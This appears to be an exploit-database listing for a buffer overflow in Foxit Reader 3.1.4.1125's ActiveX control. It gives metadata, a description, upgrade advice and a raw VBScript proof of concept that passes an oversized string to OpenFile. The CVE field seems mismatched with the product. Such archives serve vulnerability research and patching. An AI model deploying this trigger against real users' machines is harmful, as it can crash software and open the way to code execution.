header-logo
Suggest Exploit
vendor:
Foxit Reader
by:
Unknown
9,3
CVSS
HIGH
Buffer Overflow
120
CWE
Product Name: Foxit Reader
Affected Version From: 3.1.4.1125
Affected Version To: 3.1.4.1125
Patch Exists: YES
Related CWE: CVE-2009-0385
CPE: a:foxitsoftware:foxit_reader:3.1.4.1125
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows 7
2009

Foxit Reader Version 3.1.4.1125 Buffer Overflow Vulnerability

A buffer overflow vulnerability exists in Foxit Reader Version 3.1.4.1125 due to improper bounds checking of user-supplied input. An attacker can exploit this vulnerability by supplying a specially crafted argument to the OpenFile function, resulting in arbitrary code execution.

Mitigation:

Upgrade to the latest version of Foxit Reader.
Source

Exploit-DB raw data:

#Vendor :www.foxitsoftware.com
#tested on :[windows 7]
#Foxit Reader Version 3.1.4.1125

<html>
<object classid='clsid:05563215-225C-45EB-BB34-AFA47217B1DE' id='target' ></object>
<script language='vbscript'>

targetFile = "C:\Program Files\Foxit Software\Foxit Reader\plugins\FoxitReaderOCX.ocx"
prototype  = "Function OpenFile ( ByVal strFilePath As String ) As Boolean"
memberName = "OpenFile"
progid     = "FOXITREADEROCXLib.FoxitReaderOCX"
argCount   = 1
 
arg1=String(6164, "A")
 
target.OpenFile arg1 
 
</script>